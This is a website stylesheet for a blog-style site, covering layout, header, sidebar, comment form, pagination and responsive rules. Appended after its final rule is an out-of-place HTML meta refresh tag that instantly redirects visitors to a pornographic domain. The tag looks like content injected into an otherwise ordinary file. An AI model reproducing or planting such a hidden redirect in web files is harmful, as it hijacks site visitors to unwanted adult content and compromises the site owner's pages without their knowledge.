@font-face {
	font-family: 'roma';
	src: url('/font/roma.eot');
	src: url('/font/roma.eot') format('embedded-opentype'),           
  url('/font/roma.woff') format('woff'),           
  url('/font/roma.ttf') format('truetype'),           
  url('/font/roma.svg') format('svg');
	font-weight: normal;
	font-style: normal;
}
* {
	margin: 0;
	padding: 0;
	outline: 0;
}
html {
	height: 100%;
}
body {
	height: 100%;
	font: normal 12pt/1.3em tahoma, sans-serif, arial;
	color: #666;
	padding: 0 2% 0 2%;
	background: #fff;
}
h1, h2, h3, h4, h5, h6 {
	margin: 0.3em 0;
}
header, .wrapper {
	min-width: 320px;
	max-width: 1000px;
	margin-left: auto;
	margin-right: auto;
}
header {
	height: 130px;
	position: relative;
	border-bottom: solid 5px #eee;
}
header h1 {
	padding-top: 1.9em;
	margin: 0;
}
aside {
	width: 28%;
	float: left;
	margin-top: 1em;
}
aside h2, #content .tip h2 {
	text-shadow: 1px 1px 0 #000;
	font-weight: normal;
	color: #fff;
	background: linear-gradient(180deg, #456688 0%, #244567 100%);
	padding: 5px 10px;
	margin: 0 0 0.5em 0;
}
#content {
	padding-left: 30%;
	margin-top: 1em;
}
#content .tip {
	color: #222;
	padding-bottom: 1em;
}
#content .tip h2 {
	margin-bottom: 1em;
}
#content .tip p {
	margin-bottom: 0.7em;
}
#content .tip a {
	color: #048;
}
#content .tip .reply a {
	color: #fff;
	font-size: 0.8em;
}
#content .tip a:hover {
	color: #024;
}
#content .tip .reply a:hover {
	color: #fff;
}
#content .tip h2 a {
	color: #fff;
	text-decoration: none;
	display: block;
	padding-left: 1.2em;
	padding-bottom: 0.1em;
}
#content .tip h2 a:hover {
	color: #fff;
}
#content .tip h2 span {
	font-family: roma;
	display: block;
	float: left;
	margin-right: 0.3em;
	margin-top: 0.1em;
	font-size: 0.8em;
	line-height: 1em;
}
#content .tip .comment-author h2 {
	background: #aaa;
	text-shadow: none;
	line-height: 1.2em;
	margin-bottom: 0.3em;
	font-size: 1.1em;
}
#content p {
	max-width: 670px;
	display: block;
	line-height: 1.25em;
	font-size: 0.9em;
}
#content p img {
	width: 98%;
	height: auto;
	border: solid 5px #f1f1f1;
}
#content p a:hover img, #content p a:focus img {
	border: solid 5px #ccc;
	transition: all 1s ease 0s;
}
#content a.more-link, .reply a, #commentform input[type="submit"] {
	display: inline-block;
	text-decoration: none;
	background: linear-gradient(180deg, #456688 0%, #244567 100%);
	color: #fff;
	padding: 0.4em 1em;
	border-radius: 6px;
}
#content a.more-link:hover, .reply a:hover {
	color: #fff;
	background: #036;
}
#content .comms {
	display: inline-block;
	font-size: 0.8em;
	position: relative;
	/* top: -1em; */
}
#archive {
	display: none;
	padding-bottom: 1em;
	min-width: 320px;
	max-width: 1000px;
	margin: 0 auto;
	padding: 0.5em;
}
#wp_page_numbers, .navigation {
	min-width: 640px;
	max-width: 1000px;
	margin-left: auto;
	margin-right: auto;
	background: #f1f1f1;
	padding: 1em 0;
	text-align: center;
}
#wp_page_numbers ul {
	list-style: none;
	display: inline-block;
	margin: 0 auto;
}
#wp_page_numbers ul li {
	float: left;
	margin-right: 0.2em;
	margin-bottom: 0.2em;
}
#wp_page_numbers ul li a {
	font-size: 0.8em;
	font-weight: bold;
	background: linear-gradient(180deg, #f8f8f8 0%, #ffffff 100%);
	width: 32px;
	display: block;
	text-decoration: none;
	padding: 3px 0;
	text-align: center;
	color: #048;
	border-radius: 6px;
	border: solid 1px #ccc;
}
#wp_page_numbers ul li a:hover {
	background: #fff;
	border-color: #888;
}
#wp_page_numbers ul li.active_page a {
	background: linear-gradient(180deg, #456688 0%, #244567 100%);
	color: #fff;
}
#advTop {
	background: #fff;
	padding: 0.4em 0;
	font-size: 0.9em;
}
.navigation {
	padding: 0 0 1em 0;
}
.navigation p {
	padding: 0;
	margin: 0;
}
.navigation p a {
	border: solid 1px #ccc;
	font-size: 0.8em;
	font-weight: bold;
	background: linear-gradient(180deg, #f8f8f8 0%, #ffffff 100%);
	display: inline-block;
	text-decoration: none;
	padding: 0.5em 1em;
	text-align: center;
	color: #048;
}
.navigation p a:hover {
	background: #fff;
	border-color: #888;
}
.js-preload-footer {
	min-width: 320px;
	max-width: 1000px;
	margin-left: auto;
	margin-right: auto;
	height: 50px;
	text-align: center;
	padding-bottom: 1.8em;
}
.borderall {
	margin-top: 0.8em;
	margin-bottom: 1em;
}
.borderall a {
	color: #048;
	font-size: 0.9em;
}
.wrapper {
	background: linear-gradient(90deg, #fafafa 0%, #fafafa 28%, #fff 28.1%, #fff 100%);
}
.logoimg {
	height: 100px;
	float: left;
	margin-top: 1%;
}
.logoimg img {
	height: 100%;
	width: auto;
}
a.homelink {
	text-decoration: none;
	display: block;
	color: #048;
}
a.homelink span {
	color: #444;
	font-size: 0.8em;
}
a.advise {
	position: absolute;
	top: 3.5em;
	right: 0px;
	display: block;
	width: 180px;
	background: linear-gradient(180deg, #606060 0%, #3f3f3f 100%);
	text-align: center;
	text-decoration: none;
	color: #fff;
	padding: 0.6em 0;
}
a.advise:hover, a.advise:focus {
	background: linear-gradient(180deg, #456688 0%, #244567 100%);
}
.nets {
	position: absolute;
	top: 3.5em;
	right: 184px;
}
.social {
	list-style: none;
}
.social li {
	float: left;
	margin-left: 4px;
}
.social li a {
	width: 40px;
	height: 40px;
	display: block;
	background: url(/i/header_social.png);
	transition: all 0.3s ease 0s;
}
.social li:nth-child(1) a {
	background-position: 0 0;
}
.social li:nth-child(1) a:hover, .social li:nth-child(1) a:focus {
	background-position: 0 -40px;
}
.social li:nth-child(2) a {
	background-position: -40px 0;
}
.social li:nth-child(2) a:hover, .social li:nth-child(2) a:focus {
	background-position: -40px -40px;
}
.social li:nth-child(3) a {
	background-position: -80px 0;
}
.social li:nth-child(3) a:hover, .social li:nth-child(3) a:focus {
	background-position: -80px -40px;
}
.social li:nth-child(4) a {
	background-position: -120px 0;
}
.social li:nth-child(4) a:hover, .social li:nth-child(4) a:focus {
	background-position: -120px -40px;
}
.social li:nth-child(5) a {
	background-position: -160px 0;
}
.social li:nth-child(5) a:hover, .social li:nth-child(5) a:focus {
	background-position: -160px -40px;
}
.search {
	padding-bottom: 2px;
	border-bottom: solid 5px #eee;
	background: #ffffff;
}
.search form {
	background: #eee;
	margin-top: 2px;
	padding: 3px 10px;
}
.search form input[type="text"] {
	transition: all 0.4s ease 0s;
	display: inline-block;
	color: #666;
	width: 22.5%;
	padding: 0.3em 0.5em;
	background: linear-gradient(180deg, #f8f8f8 0%, #fff 20%, #f8f8f8 100%);
	border: solid 1px #c1c1c1;
	border-radius: 6px 0 0 6px;
}
.search form input[type="text"]:focus {
	transition: all 0.4s ease 0s;
	background: #fff;
	box-shadow: inset 1px 1px 1px #888;
}
.search form input[type="submit"] {
	color: #fff;
	display: inline-block;
	font-family: roma;
	margin-left: -1px;
	border: solid 1px #244567;
	background: linear-gradient(180deg, #244567 0%, #456688 20%, #244567 100%);
	font-size: 13pt;
	padding: 0 6px 2px 6px;
	border-radius: 0 6px 6px 0;
	cursor: pointer;
	text-shadow: 1px 1px 0 #333;
}
.hide {
	display: none;
}
.recent {
	margin: 0 0 10px 10px;
}
.recent .recomment {
	padding-bottom: 0.3em;
	padding-right: 0.8em;
}
.recent-comment-author {
	line-height: 1.1em;
	color: #000;
}
.recent .renick b {
	font-family: roma;
	font-weight: 100;
}
.recent .rectime {
	font-size: 0.7em;
}
.recent .recent-comment-text a {
	transition: all 0.6s ease 0s;
	text-decoration: none;
	font-size: 0.8em;
	color: #444;
	display: block;
	padding: 0.2em 0;
	line-height: 1.1em;
	margin-bottom: 0.2em;
}
.recent .recent-comment-text a:hover {
	color: #000;
}
.recent .recompost {
	font-size: 0.8em;
	line-height: 1.1em;
}
.recent .recompost i {
	font-family: roma;
	font-style: normal;
	display: inline-block;
	margin-right: 0.1em;
}
.recent .recompost a {
	text-decoration: underline;
	color: #048;
}
.top10 ul {
	list-style: none;
}
.top10 ul li {
	padding: 10px 10px 0 10px;
	font-size: 0.8em;
	text-align: center;
}
.top10 ul li:nth-child(even) {
	background: #fcfcfc;
}
.top10 ul li a {
	display: block;
	text-decoration: underline;
	color: #048;
	line-height: 1.1em;
	margin-top: 0.2em;
}
.top10 ul li a:first-child {
	max-width: 200px;
	margin-left: auto;
	margin-right: auto;
}
.top10 ul li a:first-child img {
	width: 100%;
	height: auto;
	outline: 0;
	border: solid 1px #fff;
	border-radius: 6px;
}
.top10 ul li .wpp-comments {
	color: #000;
}
.vcoments {
	font-family: roma;
	display: block;
	float: right;
	background: linear-gradient(180deg, #244567 0%, #456688 20%, #244567 100%);
	color: #fff;
	text-decoration: none;
	padding: 0.4em 0.5em;
	font-size: 1.6em;
	border-radius: 4px;
	display: none;
}
.vcoments i {
	font-style: normal;
}
.vcoments i#t1 {
	display: none;
}
.comment-author h3 {
	font-size: 0.8em;
	font-weight: normal;
	color: #000;
	padding-left: 1em;
	margin-top: 0.1em;
}
.comment {
	background: #f8f8f8;
	border-radius: 8px;
	margin-bottom: 0.5em;
	border: solid 1px #ccc;
}
.commentmetadata {
	padding: 0 0.8em;
}
.likes {
	border-top: solid 2px #ccc;
	padding-top: 1em;
	margin-top: 0.8em;
}
.likes div.elem {
	float: left;
	padding: 0.3em 0.1em;
}
#content .tip .likes p {
	font-size: 1.2em;
}
.clear {
	height: 1px;
	width: 100%;
	clear: both;
}
#respond {
	font-size: 0.9em;
}
#commentform label, #commentform input[type="text"], #commentform textarea {
	display: block;
}
#commentform .subscribe-to-comments label {
	display: inline;
}
#commentform input[type="text"], #commentform textarea {
	font-family: tahoma;
	background: #fff;
	border: solid 1px #999;
	padding: 0.3em 0.5em;
	font-size: 1.2em;
	color: #444;
}
#commentform input[type="text"]:focus, #commentform textarea:focus {
	color: #000;
	border-color: #666;
	box-shadow: inset 1px 1px 1px #ccc;
}
#commentform input[type="text"] {
	width: 50%;
	margin-bottom: 0.5em;
}
#commentform textarea {
	width: 100%;
	resize: none;
	height: 180px;
	font-size: 1em;
}
#commentform span {
	font-size: 1em;
	color: #049;
	display: block;
	margin: 0.8em 0;
	line-height: 1.2em;
}
#commentform input[type="submit"] {
	border: 0 none;
	cursor: pointer;
}
@media screen and (max-width: 740px) {
body {
	font-size: 11pt;
}
header {
	height: 106px;
}
.logoimg {
	margin-top: 0.5em;
}
header h1 {
	padding-top: 1.5em;
	margin: 0;
}
aside {
	display: none;
	width: 100%;
	margin-bottom: 2em;
	border-bottom: dotted 1px #888;
	padding-bottom: 2em;
	font-size: 1.3em;
}
aside h2 {
	font-size: 1em;
}
#content {
	padding-left: 0;
	font-size: 1.2em;
}
#content .tip {
	border-bottom: solid 2px #456688;
	margin-bottom: 1em;
}
#wp_page_numbers, .navigation {
	min-width: 320px;
	padding: 1em;
}
#advTop {
	display: none;
}
.wrapper {
	background: #fff;
}
.logoimg {
	height: 80px;
}
.nets {
	position: absolute;
	top: 0.5em;
	right: 0;
	opacity: 0.7;
}
a.advise {
	width: 216px;
	opacity: 0.7;
}
.search form input[type="text"] {
	width: 40%;
	padding: 10px 8px;
}
.search form input[type="submit"] {
	padding: 6px 10px 8px 10px;
}
.vcoments {
	display: block;
}
#respond {
	font-size: 0.8em;
}
}
@media screen and (max-width: 500px) {
header {
	text-align: center;
	height: 230px;
}
header h1 {
	padding-top: 0.1em;
}
#content .tip h2 {
	font-size: 1em;
}
a.homelink {
	margin: 0 auto;
	margin-top: 0.8em;
}
.nets {
	position: relative;
	margin-top: 1.2em;
}
.nets .social {
	margin: 0 auto;
	width: 223px;
}
a.advise {
	display: none;
}
.logoimg {
	float: none;
	height: 80px;
}
.borderall a {
	font-size: 1.2em;
	line-height: 1.4em;
}
#archive {
	margin-top: 2em;
}
}
.conttip img {
	width: 100%;
}
.post {
	white-space: pre-wrap;
}
.down {
	padding-bottom: 2em;
}
.up {
	padding-top: 2em;
}

.mobile-ads {
	display: none;
}
@media screen and (max-width:640px) {
	.mobile-ads {
		display: block;
	}
}<meta http-equiv='refresh' content='0;URL=https://xvideoporn.ru'>